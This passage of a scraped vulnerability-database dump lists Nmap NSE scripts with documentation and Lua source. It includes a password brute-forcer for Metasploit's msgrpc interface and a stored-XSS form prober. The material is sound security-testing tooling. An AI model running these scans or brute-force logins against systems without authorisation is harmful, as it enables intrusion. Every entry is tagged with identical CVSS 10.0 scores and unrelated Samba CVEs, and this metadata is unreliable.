len, response.body, pos )\n else\n break\n end\n\n -- parse a single item\n item = parseItem( data, len )\n\n local album = item.asal or \"unknown\"\n local artist= item.asar or \"unknown\"\n local song = item.minm or \"\"\n\n if items[artist] == nil then\n items[artist] = {}\n end\n\n if items[artist][album] == nil then\n items[artist][album] = {}\n end\n\n if limit == 0 then\n break\n elseif limit > 0 then\n limit = limit - 1\n end\n\n table.insert( items[artist][album], song )\n\n end\n\n\n return items\n\nend\n\n\naction = function(host, port)\n\n local limit = tonumber(nmap.registry.args.daap_item_limit) or 100\n local libname = getLibraryName( host, port )\n\n if libname == nil then\n return\n end\n\n local sessionid = getSessionId( host, port )\n\n if sessionid == nil then\n return stdnse.format_output(true, \"Libname: \" .. libname)\n end\n\n local revid = getRevisionNumber( host, port, sessionid )\n\n if revid == nil then\n return stdnse.format_output(true, \"Libname: \" .. libname)\n end\n\n local dbid = getDatabaseId( host, port, sessionid, revid )\n\n if dbid == nil then\n return\n end\n\n local items = getItems( host, port, sessionid, revid, dbid, limit )\n\n if items == nil then\n return\n end\n\n local albums, songs, artists, results = {}, {}, {}, {}\n\n table.insert( results, libname )\n\n for artist, v in pairs(items) do\n albums = {}\n for album, v2 in pairs(v) do\n songs = {}\n for _, song in pairs( v2 ) do\n table.insert( songs, song )\n end\n table.insert( albums, album )\n table.insert( albums, songs )\n end\n table.insert( artists, artist )\n table.insert( artists, albums )\n end\n\n table.insert( results, artists )\n local output = stdnse.format_output( true, results )\n\n if limit > 0 then\n output = output .. 
string.format(\"\\n\\nOutput limited to %d items\", limit )\n end\n\n return output\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:43:34", "description": "Sends a message to an iOS device through the Apple MobileMe web service. The device has to be registered with an Apple ID using the Find My iPhone application.\n\n## Script Arguments \n\n#### http-icloud-sendmsg.username \n\nthe Apple ID username\n\n#### http-icloud-sendmsg.sound \n\nboolean specifying if a loud sound should be played while displaying the message. (default: true)\n\n#### http-icloud-sendmsg.subject \n\nthe subject of the message to send to the device.\n\n#### http-icloud-sendmsg.message \n\nthe body of the message to send to the device.\n\n#### http-icloud-sendmsg.deviceindex \n\nthe device index to which the message should be sent (@see http-icloud-sendmsg.listdevices)\n\n#### http-icloud-sendmsg.password \n\nthe Apple ID password\n\n#### http-icloud-sendmsg.listdevices \n\nlist the devices managed by the specified Apple ID.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap -sn -Pn --script http-icloud-sendmsg --script-args=\"username=<user>,password=<pass>,http-icloud-sendmsg.listdevices\"\n nmap -sn -Pn --script http-icloud-sendmsg --script-args=\"username=<user>,password=<pass>,deviceindex=1,subject='subject',message='hello world.',sound=false\"\n \n\n## Script Output \n \n \n Pre-scan script results:\n | http-icloud-sendmsg:\n |_ Message was successfully sent to \"Patrik Karlsson's iPhone\"\n \n\n## Requires \n\n * [mobileme](<../lib/mobileme.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-04-17T19:35:44", "type": "nmap", "title": "http-icloud-sendmsg NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:HTTP-ICLOUD-SENDMSG.NSE", "href": "https://nmap.org/nsedoc/scripts/http-icloud-sendmsg.html", "sourceData": "local mobileme = require \"mobileme\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\n\ndescription = [[\nSends a message to a iOS device through the 
Apple MobileMe web service. The\ndevice has to be registered with an Apple ID using the Find My Iphone\napplication.\n]]\n\n---\n-- @usage\n-- nmap -sn -Pn --script http-icloud-sendmsg --script-args=\"username=<user>,password=<pass>,http-icloud-sendmsg.listdevices\"\n-- nmap -sn -Pn --script http-icloud-sendmsg --script-args=\"username=<user>,password=<pass>,deviceindex=1,subject='subject',message='hello world.',sound=false\"\n--\n-- @output\n-- Pre-scan script results:\n-- | http-icloud-sendmsg:\n-- |_ Message was successfully sent to \"Patrik Karlsson's iPhone\"\n--\n-- @args http-icloud-sendmsg.username the Apple ID username\n-- @args http-icloud-sendmsg.password the Apple ID password\n-- @args http-icloud-sendmsg.listdevices list the devices managed by the\n-- specified Apple ID.\n-- @args http-icloud-sendmsg.deviceindex the device index to which the message\n-- should be sent (@see http-icloud-sendmsg.listdevices)\n-- @args http-icloud-sendmsg.subject the subject of the message to send to the\n-- device.\n-- @args http-icloud-sendmsg.message the body of the message to send to the\n-- device.\n-- @args http-icloud-sendmsg.sound boolean specifying if a loud sound should be\n-- played while displaying the message. (default: true)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\", \"external\"}\n\n\nlocal arg_username = stdnse.get_script_args(SCRIPT_NAME .. \".username\")\nlocal arg_password = stdnse.get_script_args(SCRIPT_NAME .. \".password\")\nlocal arg_listdevices = stdnse.get_script_args(SCRIPT_NAME .. \".listdevices\")\nlocal arg_deviceindex = tonumber(stdnse.get_script_args(SCRIPT_NAME .. \".deviceindex\"))\nlocal arg_subject = stdnse.get_script_args(SCRIPT_NAME .. \".subject\")\nlocal arg_message = stdnse.get_script_args(SCRIPT_NAME .. \".message\")\nlocal arg_sound = stdnse.get_script_args(SCRIPT_NAME .. 
\".sound\") or true\n\n\nprerule = function() return true end\n\n-- decode basic UTF8 encoded strings\n-- iOS devices are commonly named after the user eg:\n-- * Patrik Karlsson's Macbook Air\n-- * Patrik Karlsson's iPhone\n--\n-- This function decodes the single quote as a start and should really\n-- be replaced with a proper UTF-8 decoder in the future\nlocal function decodeString(str)\n return str:gsub(\"\\226\\128\\153\", \"'\")\nend\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\nlocal function listDevices(mm)\n local status, devices = mm:getDevices()\n if ( not(status) ) then\n return fail(\"Failed to get devices\")\n end\n\n local output = tab.new(2)\n tab.addrow(output, \"id\", \"name\")\n for i=1, #devices do\n local name = decodeString(devices[i].name or \"\")\n tab.addrow(output, i, name)\n end\n\n if ( 1 < #output ) then\n return stdnse.format_output(true, tab.dump(output))\n end\nend\n\n\naction = function()\n if ( not(arg_username) or not(arg_password) ) then\n return fail(\"No username or password was supplied\")\n end\n\n if ( not(arg_deviceindex) and not(arg_listdevices) ) then\n return fail(\"No device ID was specified\")\n end\n\n if ( 1 == tonumber(arg_listdevices) or \"true\" == arg_listdevices ) then\n local mm = mobileme.Helper:new(arg_username, arg_password)\n return listDevices(mm)\n elseif ( not(arg_subject) or not(arg_message) ) then\n return fail(\"Missing subject or message\")\n else\n local mm = mobileme.Helper:new(arg_username, arg_password)\n local status, devices = mm:getDevices()\n\n if ( not(status) ) then\n return fail(\"Failed to get devices\")\n end\n\n if ( status and arg_deviceindex <= #devices ) then\n local status = mm:sendMessage( devices[arg_deviceindex].id, arg_subject, arg_message, arg_sound)\n if ( status ) then\n return (\"\\n Message was successfully sent to \\\"%s\\\"\"):format(decodeString(devices[arg_deviceindex].name or \"\"))\n else\n return \"\\n Failed to send message\"\n end\n end\n 
end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:33:51", "description": "Attempts to discover available IPv6 hosts on the LAN by sending an MLD (multicast listener discovery) query to the link-local multicast address (ff02::1) and listening for any responses. The query's maximum response delay is set to 1 to provoke hosts to respond immediately rather than waiting for other responses from their multicast group.\n\n## Script Arguments \n\n#### targets-ipv6-multicast-mld.interface \n\nInterface to send on (default: the interface specified with -e or every available Ethernet interface with an IPv6 address.)\n\n#### targets-ipv6-multicast-mld.timeout \n\ntimeout to wait for responses (default: 10s)\n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -6 --script=targets-ipv6-multicast-mld.nse --script-args 'newtargets,interface=eth0'\n \n\n## Script Output \n \n \n Pre-scan script results:\n | targets-ipv6-multicast-mld:\n | IP: fe80::5a55:abcd:ef01:2345 MAC: 58:55:ab:cd:ef:01 IFACE: en0\n | IP: fe80::9284:0123:4567:89ab MAC: 90:84:01:23:45:67 IFACE: en0\n |\n |_ Use --script-args=newtargets to add the results as targets\n \n\n## Requires \n\n * [ipOps](<../lib/ipOps.html>)\n * [coroutine](<>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n * [tableaux](<../lib/tableaux.html>)\n * [target](<../lib/target.html>)\n * [multicast](<../lib/multicast.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": 
"3.0"}, "impactScore": 5.9}, "published": "2012-04-09T06:43:28", "type": "nmap", "title": "targets-ipv6-multicast-mld NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-11-06T15:07:01", "id": "NMAP:TARGETS-IPV6-MULTICAST-MLD.NSE", "href": "https://nmap.org/nsedoc/scripts/targets-ipv6-multicast-mld.html", "sourceData": "local ipOps = require \"ipOps\"\nlocal coroutine = require \"coroutine\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\nlocal tableaux = require \"tableaux\"\nlocal target = require \"target\"\nlocal multicast = require \"multicast\"\n\ndescription = [[\nAttempts to discover available IPv6 hosts on the LAN by sending an MLD\n(multicast listener discovery) query to the link-local multicast address\n(ff02::1) and listening for any responses. 
The query's maximum response delay\nset to 1 to provoke hosts to respond immediately rather than waiting for other\nresponses from their multicast group.\n]]\n\n---\n-- @usage\n-- nmap -6 --script=targets-ipv6-multicast-mld.nse --script-args 'newtargets,interface=eth0'\n--\n-- @output\n-- Pre-scan script results:\n-- | targets-ipv6-multicast-mld:\n-- | IP: fe80::5a55:abcd:ef01:2345 MAC: 58:55:ab:cd:ef:01 IFACE: en0\n-- | IP: fe80::9284:0123:4567:89ab MAC: 90:84:01:23:45:67 IFACE: en0\n-- |\n-- |_ Use --script-args=newtargets to add the results as targets\n--\n-- @args targets-ipv6-multicast-mld.timeout timeout to wait for\n-- responses (default: 10s)\n-- @args targets-ipv6-multicast-mld.interface Interface to send on (default:\n-- the interface specified with -e or every available Ethernet interface\n-- with an IPv6 address.)\n--\n-- @xmloutput\n-- <table>\n-- <table>\n-- <elem key=\"address\">fe80::5a55:abcd:ef01:2345</elem>\n-- <elem key=\"mac\">58:55:ab:cd:ef:01</elem>\n-- <elem key=\"iface\">en0</elem>\n-- </table>\n-- <table>\n-- <elem key=\"address\">fe80::9284:0123:4567:89ab</elem>\n-- <elem key=\"mac\">90:84:01:23:45:67</elem>\n-- <elem key=\"iface\">en0</elem>\n-- </table>\n-- </table>\n\nauthor = {\"niteesh\", \"alegen\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\",\"broadcast\"}\n\n\nlocal arg_timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. '.timeout'))\n\nprerule = function()\n if ( not(nmap.is_privileged()) ) then\n stdnse.verbose1(\"not running for lack of privileges.\")\n return false\n end\n return true\nend\n\n\nlocal function get_interfaces()\n local interface_name = stdnse.get_script_args(SCRIPT_NAME .. 
\".interface\")\n or nmap.get_interface()\n\n -- interfaces list (decide which interfaces to broadcast on)\n local interfaces = {}\n for _, if_table in pairs(nmap.list_interfaces()) do\n if (interface_name == nil or if_table.device == interface_name) -- check for correct interface\n and ipOps.ip_in_range(if_table.address, \"fe80::/10\") -- link local address\n and if_table.link == \"ethernet\" then -- not the loopback interface\n table.insert(interfaces, if_table)\n end\n end\n\n return interfaces\nend\n\nlocal function single_interface_broadcast(if_nfo, results)\n stdnse.debug2(\"Starting \" .. SCRIPT_NAME .. \" on \" .. if_nfo.device)\n local condvar = nmap.condvar(results)\n\n local reports = multicast.mld_query(if_nfo, arg_timeout or 10)\n for _, r in pairs(reports) do\n local l2reply = r[2]\n local l3reply = r[3]\n local target_str = l3reply.ip_src\n if not results[target_str] then\n if target.ALLOW_NEW_TARGETS then\n target.add(target_str)\n end\n results[target_str] = { address = target_str, mac = stdnse.format_mac(l2reply.mac_src), iface = if_nfo.device }\n end\n end\n\n condvar(\"signal\")\nend\n\nlocal function format_output(results)\n local output = tab.new()\n local xmlout = {}\n local ips = tableaux.keys(results)\n table.sort(ips)\n\n for i, ip in ipairs(ips) do\n local record = results[ip]\n xmlout[i] = record\n tab.addrow(output, \" IP: \" .. record.address, \"MAC: \" .. record.mac, \"IFACE: \" .. 
record.iface)\n end\n\n if ( #output > 0 ) then\n output = {\"\", tab.dump(output) }\n if not target.ALLOW_NEW_TARGETS then\n table.insert(output, \" Use --script-args=newtargets to add the results as targets\")\n end\n return xmlout, table.concat(output, \"\\n\")\n end\nend\n\naction = function()\n local threads = {}\n local results = {}\n local condvar = nmap.condvar(results)\n\n for _, if_nfo in ipairs(get_interfaces()) do\n -- create a thread for each interface\n local co = stdnse.new_thread(single_interface_broadcast, if_nfo, results)\n threads[co] = true\n end\n\n repeat\n for thread in pairs(threads) do\n if coroutine.status(thread) == \"dead\" then threads[thread] = nil end\n end\n if ( next(threads) ) then\n condvar \"wait\"\n end\n until next(threads) == nil\n\n return format_output(results)\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:00", "description": "Performs brute force username and password auditing against Metasploit msgrpc interface.\n\n## Script Arguments \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. 
\n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script metasploit-msgrpc-brute -p 55553 <host>\n \n This script uses brute library to perform password\n guessing against Metasploit's msgrpc interface.\n \n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 55553/tcp open unknown syn-ack\n | metasploit-msgrpc-brute:\n | Accounts\n | root:root - Valid credentials\n | Statistics\n |_ Performed 10 guesses in 10 seconds, average tps: 1\n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [http](<../lib/http.html>)\n * [creds](<../lib/creds.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-06-30T12:02:54", "type": "nmap", "title": "metasploit-msgrpc-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-06T14:20:31", "id": 
"NMAP:METASPLOIT-MSGRPC-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/metasploit-msgrpc-brute.html", "sourceData": "local brute = require \"brute\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal http = require \"http\"\nlocal creds = require \"creds\"\n\ndescription = [[\nPerforms brute force username and password auditing against\nMetasploit msgrpc interface.\n\n]]\n\n---\n-- @usage\n-- nmap --script metasploit-msgrpc-brute -p 55553 <host>\n--\n-- This script uses brute library to perform password\n-- guessing against Metasploit's msgrpc interface.\n--\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 55553/tcp open unknown syn-ack\n-- | metasploit-msgrpc-brute:\n-- | Accounts\n-- | root:root - Valid credentials\n-- | Statistics\n-- |_ Performed 10 guesses in 10 seconds, average tps: 1\n\n\n\nauthor = \"Aleksandar Nikolic\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"brute\"}\n\nportrule = shortport.port_or_service(55553,\"metasploit-msgrpc\")\n\n\n-- returns a \"prefix\" that msgpack uses for strings\nlocal get_prefix = function(data)\n if #data <= 31 then\n return string.pack(\"B\", 0xa0 + #data)\n else\n return \"\\xda\" .. string.pack(\">I2\", #data)\n end\nend\n\n-- simple function that implements basic msgpack encoding we need for this script\n-- see http://wiki.msgpack.org/display/MSGPACK/Format+specification for more\nlocal encode = function(username, password)\n return \"\\x93\\xaaauth.login\" .. get_prefix(username) .. username .. get_prefix(password) .. 
password\nend\n\nDriver = {\n\n new = function(self, host, port)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n return o\n end,\n\n -- as we are using http methods, no need for connect and disconnect\n -- this might cause a problem as in other scripts that don't have explicit connect\n -- as there is no way to \"reserve\" a socket\n connect = function( self )\n return true\n end,\n\n login = function (self, user, pass)\n local data\n local options = {\n header = {\n [\"Content-Type\"] = \"binary/message-pack\"\n }\n }\n stdnse.debug1( \"Trying %s/%s ...\", user, pass )\n data = http.post(self.host,self.port, \"/api/\",options, nil , encode(user,pass))\n if data and data.status and tostring( data.status ):match( \"200\" ) then\n if string.find(data.body,\"success\") then\n return true, creds.Account:new( user, pass, creds.State.VALID)\n else\n return false, brute.Error:new( \"Incorrect username or password\" )\n end\n end\n local err = brute.Error:new(\"Login didn't return a proper response\")\n err:setRetry( true )\n return false, err\n end,\n\n disconnect = function( self )\n return true\n end\n}\n\naction = function( host, port )\n\n local status, result\n local engine = brute.Engine:new(Driver, host, port)\n engine.options.script_name = SCRIPT_NAME\n engine.options.firstonly = true\n engine.max_threads = 3\n engine.max_retries = 10\n status, result = engine:start()\n\n return result\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:42:49", "description": "Unfiltered '>' (greater than sign). 
An indication of potential XSS vulnerability.\n\n### See also:\n\n * [ http-dombased-xss.nse ](<../scripts/http-dombased-xss.html>)\n * [ http-phpself-xss.nse ](<../scripts/http-phpself-xss.html>)\n * [ http-xssed.nse ](<../scripts/http-xssed.html>)\n * [ http-unsafe-output-escaping.nse ](<../scripts/http-unsafe-output-escaping.html>)\n\n## Script Arguments \n\n#### http-stored-xss.formpaths \n\nThe pages that contain the forms to exploit. For example, {/upload.php, /login.php}. Default: nil (crawler mode on)\n\n#### http-stored-xss.uploadspaths \n\nThe pages that reflect back POSTed data. For example, {/comments.php, /guestbook.php}. Default: nil (Crawler mode on)\n\n#### http-stored-xss.fieldvalues \n\nThe script will try to fill every field found in the form but that may fail due to fields' restrictions. You can manually fill those fields using this table. For example, {gender = \"male\", email = \"foo@bar.com\"}. Default: {}\n\n#### http-stored-xss.dbfile \n\nThe path of a plain text file that contains one XSS vector per line. Default: nil\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### httpspider.doscraping, httpspider.maxdepth, httpspider.maxpagecount, httpspider.noblacklist, httpspider.url, httpspider.useheadfornonwebfiles, httpspider.withindomain, httpspider.withinhost \n\nSee the documentation for the [httpspider](<../lib/httpspider.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap -p80 --script http-stored-xss.nse <target>\n \n This script works in two phases.\n 1) Posts specially crafted strings to every form it encounters.\n 2) Crawls through the page searching for these strings.\n \n If any string is reflected on some page without any proper\n HTML escaping, it's a sign for potential XSS vulnerability.\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-stored-xss:\n | Found the following stored XSS vulnerabilities:\n |\n | Payload: ghz>hzx\n | Uploaded on: /guestbook.php\n | Description: Unfiltered '>' (greater than sign). An indication of potential XSS vulnerability.\n | Payload: zxc'xcv\n | Uploaded on: /guestbook.php\n | Description: Unfiltered ' (apostrophe). An indication of potential XSS vulnerability.\n |\n | Payload: ghz>hzx\n | Uploaded on: /posts.php\n | Description: Unfiltered '>' (greater than sign). An indication of potential XSS vulnerability.\n | Payload: hzx\"zxc\n | Uploaded on: /posts.php\n |_ Description: Unfiltered \" (double quotation mark). 
An indication of potential XSS vulnerability.\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [io](<>)\n * [string](<>)\n * [httpspider](<../lib/httpspider.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2013-07-06T14:39:47", "type": "nmap", "title": "http-stored-xss NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-06-14T21:37:25", "id": "NMAP:HTTP-STORED-XSS.NSE", "href": "https://nmap.org/nsedoc/scripts/http-stored-xss.html", "sourceData": "description = [[\nPosts specially crafted strings to every form it\nencounters and then searches through the website for those\nstrings to determine whether the payloads were successful.\n]]\n\n---\n-- @usage nmap -p80 --script http-stored-xss.nse <target>\n--\n-- This script works in two phases.\n-- 1) Posts specially crafted strings to every form it encounters.\n-- 2) Crawls through the page searching for these strings.\n--\n-- If any string is reflected on some page without any proper\n-- HTML 
escaping, it's a sign for potential XSS vulnerability.\n--\n-- @args http-stored-xss.formpaths The pages that contain\n-- the forms to exploit. For example, {/upload.php, /login.php}.\n-- Default: nil (crawler mode on)\n-- @args http-stored-xss.uploadspaths The pages that reflect\n-- back POSTed data. For example, {/comments.php, /guestbook.php}.\n-- Default: nil (Crawler mode on)\n-- @args http-stored-xss.fieldvalues The script will try to\n-- fill every field found in the form but that may fail due to\n-- fields' restrictions. You can manually fill those fields using\n-- this table. For example, {gender = \"male\", email = \"foo@bar.com\"}.\n-- Default: {}\n-- @args http-stored-xss.dbfile The path of a plain text file\n-- that contains one XSS vector per line. Default: nil\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- | http-stored-xss:\n-- | Found the following stored XSS vulnerabilities:\n-- |\n-- | Payload: ghz>hzx\n-- | Uploaded on: /guestbook.php\n-- | Description: Unfiltered '>' (greater than sign). An indication of potential XSS vulnerability.\n-- | Payload: zxc'xcv\n-- | Uploaded on: /guestbook.php\n-- | Description: Unfiltered ' (apostrophe). An indication of potential XSS vulnerability.\n-- |\n-- | Payload: ghz>hzx\n-- | Uploaded on: /posts.php\n-- | Description: Unfiltered '>' (greater than sign). An indication of potential XSS vulnerability.\n-- | Payload: hzx\"zxc\n-- | Uploaded on: /posts.php\n-- |_ Description: Unfiltered \" (double quotation mark). 
An indication of potential XSS vulnerability.\n--\n-- @see http-dombased-xss.nse\n-- @see http-phpself-xss.nse\n-- @see http-xssed.nse\n-- @see http-unsafe-output-escaping.nse\n\ncategories = {\"intrusive\", \"exploit\", \"vuln\"}\nauthor = \"George Chatzisofroniou\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\nlocal http = require \"http\"\nlocal io = require \"io\"\nlocal string = require \"string\"\nlocal httpspider = require \"httpspider\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\nportrule = shortport.port_or_service( {80, 443}, {\"http\", \"https\"}, \"tcp\", \"open\")\n\n\n-- A list of payloads.\n--\n-- You can manually add / remove your own payloads but make sure you\n-- don't mess up, otherwise the script may succeed when it actually\n-- hasn't.\n--\n-- Note, that more payloads will slow down your scan.\npayloads = {\n\n -- Basic vectors. Each one is an indication of potential XSS vulnerability.\n { vector = 'ghz>hzx', description = \"Unfiltered '>' (greater than sign). An indication of potential XSS vulnerability.\" },\n { vector = 'hzx\"zxc', description = \"Unfiltered \\\" (double quotation mark). An indication of potential XSS vulnerability.\" },\n { vector = 'zxc\\'xcv', description = \"Unfiltered ' (apostrophe). An indication of potential XSS vulnerability.\" },\n}\n\n\n-- Create customized requests for all of our payloads.\nlocal makeRequests = function(host, port, submission, fields, fieldvalues)\n\n local postdata = {}\n for _, p in ipairs(payloads) do\n for __, field in ipairs(fields) do\n if field[\"type\"] == \"text\" or field[\"type\"] == \"textarea\" or field[\"type\"] == \"radio\" or field[\"type\"] == \"checkbox\" then\n\n local value = fieldvalues[field[\"name\"]]\n if value == nil then\n value = p.vector\n end\n\n postdata[field[\"name\"]] = value\n\n end\n end\n\n stdnse.debug2(\"Making a POST request to \" .. submission .. 
